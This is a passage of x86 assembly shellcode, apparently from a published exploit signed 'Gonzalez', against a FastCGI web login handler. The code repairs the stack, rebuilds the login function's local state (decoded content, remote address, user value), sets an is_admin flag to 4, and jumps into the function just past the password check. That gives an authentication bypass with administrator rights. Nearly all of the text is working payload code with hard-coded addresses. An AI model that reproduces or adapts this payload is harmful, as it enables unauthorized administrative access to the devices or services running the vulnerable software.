    ; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc]
    ; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax
    mov eax, [eax+0xc]
    mov [ebp-0x100], eax


    ; simulate call to login function. copy args
    mov ecx, [ebp-0x10c]
    mov eax, [ebp-0x198]
    mov edx, [ebp-0x194]
    mov [esp+0x4],eax
    mov [esp+0x8],edx
    mov [esp],ecx


    ; Now setup the login function stack

    ; current esp/ebp
    ; ----------------
    ; esp 0x3ff0b6f0
    ; ebp 0x3ffffcb8

    ; we want to land into the login function
    ; ---------------------------------------
    ; esp 0x3ff0b420
    ; ebp 0x3ff0b6e8

    ; we'll do
    ;---------
    ; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720'
    ; 3ff0b420
    ; ESP = ESP - 720
    ; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912'
    ; 3ff0b6e8
    ; EBP = EBP - 1000912

    ; stack fix
    sub esp, 720
    sub ebp, 1000912


    ; EBX -> .GOT (same as above btw)
    mov ebx, 0x805dff4


    ; simulate "decode HTTP content" fct, at top of the login function
    mov edx, [ebp+0x8]
    mov edx, [edx+0x8]
    mov dword [esp+0x4], 0x0 ; no content_encoding header
    mov [esp], edx
    mov esi, 0x0804d990
    call esi ; decode content
    mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1


    ; simulate "search remote_address"
    mov eax, [ebp+0x8]
    mov eax, [eax+0x14]
    mov [esp+0x4],eax
    lea eax,[ebx-0x3ceb]
    mov [esp],eax
    mov esi, 0x804b670 ;FCGX_GetParam
    call esi
    add eax, 0x7 ; remove '::ffff:' ====> to improve
    mov [ebp-0x60], eax


    ; is_admin = 4
    mov dword [ebp-0x48], 0x4


    ; simulate "search req_user value"
    mov eax, [ebp-0x70]
    mov eax, [eax+0x50]
    mov dword [esp+0x8],0x0
    lea edx,[ebx-0x3c93]
    mov [esp+0x4],edx
    mov [esp],eax
    mov esi, 0x804c07e
    call esi ; <FCGX_PutStr@plt+0x3de>
    mov [ebp-0x68],eax


    ; v49 = 2 (ipv4)
    mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1

    ; challenge
    mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1

    ; set v43 to null
    mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1


    ; ok, we are ready to jump in the middle of the "login" function
    ; right after the password verification

    ; jump here
    ; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200
    ; 804ee52: 00
    ; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
    ; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt>

    mov edi, 0x804ee4b
    jmp edi
    =cut

    -Gonzalez
